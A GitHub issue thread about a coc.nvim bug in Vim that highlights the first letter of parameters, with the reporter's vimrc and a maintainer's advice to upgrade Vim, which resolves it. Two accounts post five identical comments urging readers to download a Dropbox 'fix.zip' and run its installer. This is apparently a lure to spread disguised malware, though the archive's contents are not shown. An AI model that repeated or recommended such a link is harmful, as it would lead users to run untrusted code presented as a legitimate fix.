### ISSUE TITLE
parameter highlighting bug

### ISSUE THREAD

**Issue by hoysong** [neoclide/coc.nvim#5125]
## versions

vim version: VIM - Vi IMproved 8.2 8022121
node version: v20.17.0
coc.nvim version: 0.0.82-c5ffbb3c 2024-08-01 17:40:42 +0800
coc.nvim directory: /home/hoysong/.vim/plugged/coc.nvim
term: dumb
platform: linux

## Log of coc.nvim

2024-08-26T09:02:11.413 INFO (pid:1366342) [plugin] - coc.nvim initialized with node: v20.17.0 after 88
2024-08-26T09:02:11.418 INFO (pid:1366342) [services] - LanguageClient clangd state change: stopped => starting
2024-08-26T09:02:11.420 INFO (pid:1366342) [language-client-index] - Language server "clangd" started with 1366388
2024-08-26T09:02:11.426 INFO (pid:1366342) [services] - LanguageClient clangd state change: starting => running
2024-08-26T09:02:11.428 INFO (pid:1366342) [services] - service clangd started
2024-08-26T09:04:48.878 INFO (pid:1366342) [attach] - receive notification: showInfo []

## Describe the bug

The first letter of all parameters is highlighted.

## Reproduce the bug

**We will close your issue when you don't provide minimal vimrc and we can't
reproduce it**
==== .vimrc below ====
```
if has("systax")
    syntax on
endif

set autoindent
set cindent
set smartindent
set ts=4
set shiftwidth=4
set hlsearch
set nu
set cursorline

set list lcs=tab:\ \ │
set relativenumber
" Enable copy to clipboard
set clipboard=unnamed

" === 터미널 관련 설정 ===
set termwinsize=10x210 " vim 안에서 ':term' 명령을 통해 생성된 터미널의 크기입니다. (수직)x(수평)
autocmd VimEnter * below term  
autocmd VimEnter * wincmd k " 생성된 터미널에 있는 커서를 편집중인 파일로 이동합니다.
" === 터미널 관련 설정 끝 ===
"
set omnifunc=syntaxcomplete#Complete

filetype plugin indent on    " required
set nocompatible              " be iMproved, required
filetype off                  " required

set rtp+=~/.vim/bundle/Vundle.vim " set the runtime path to include Vundle and initialize
call vundle#begin()
Plugin 'VundleVim/Vundle.vim' "let Vundle manage Vundle, required
" add airline design
Plugin 'vim-airline/vim-airline'
Plugin 'scrooloose/nerdtree' "FileTreePlugin. :NERDTreeToggle로 on off가능
Plugin 'scrooloose/syntastic' "코드 문법체크 플러그인
" Plugin 'nathanaelkane/vim-indent-guides' " 인던트 라인
call vundle#end()            " required
" vimplug_init
let data_dir = has('nvim') ? stdpath('data') . '/site' : '~/.vim'
if empty(glob(data_dir . '/autoload/plug.vim'))
  silent execute '!curl -fLo '.data_dir.'/autoload/plug.vim --create-dirs  https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim'
  autocmd VimEnter * PlugInstall --sync | source $MYVIMRC
endif

call plug#begin('~/.vim/plugged')
Plug 'neoclide/coc.nvim', {'branch': 'release'}
call plug#end()

filetype plugin indent on    " required

autocmd VimEnter * NERDTree | set nu | wincmd p " nerdtree를 toggle on하고 커서를 우측(편집중인 파일)로 이동합니다.
autocmd VimEnter * highlight CocFloating ctermbg=0
" Exit Vim if NERDTree is the only window remaining in the only tab.
autocmd BufEnter * if tabpagenr('$') == 1 && winnr('$') == 1 && exists('b:NERDTree') && b:NERDTree.isTabTree() | call feedkeys(":quit\<CR>:\<BS>") | endif
" .zshrc 파일의 마지막에 ls를 추가하면 목록이 출력됩니다.
let g:coc_disable_startup_warning = 1

"autocmd ColorScheme *
"			\ hi CocUnusedHighlight cterm=underline gui=underline guifg=#808080
autocmd CursorHold * silent call CocActionAsync('highlight')

```

=================== vimrc end

- Create file `mini.vim` with：

  ```vim
  set nocompatible
  set runtimepath^=/path/to/coc.nvim
  filetype plugin indent on
  syntax on
  set hidden
  ```

- Start (neo)vim with command: `vim -u mini.vim`

- Operate vim.

## Screenshots (optional)
![스크린샷 2024-08-26 09-02-22](https://github.com/user-attachments/assets/a78139a7-6329-47d7-809d-773fbe3d1775)

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by hoysong** [comment]
> commented

Thanks for the reply.
However, the file does not run because it is in a Linux environment.

**Comment by hoysong** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

Thanks for the reply.
However, the file does not run because it is in a Linux environment.

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by fannheyward** [comment]
> Vi IMproved 8.2 8022121

Upgrade your vim and try again, it's recommended to use vim >= 9.0.0438 https://github.com/neoclide/coc.nvim/wiki/Install-coc.nvim#requirements

**Comment by hoysong** [comment]
> > Vi IMproved 8.2 8022121
> 
> Upgrade your vim and try again, it's recommended to use vim >= 9.0.0438 https://github.com/neoclide/coc.nvim/wiki/Install-coc.nvim#requirements

thanks a lot!
After update vim, I found why this happening and fixed it.
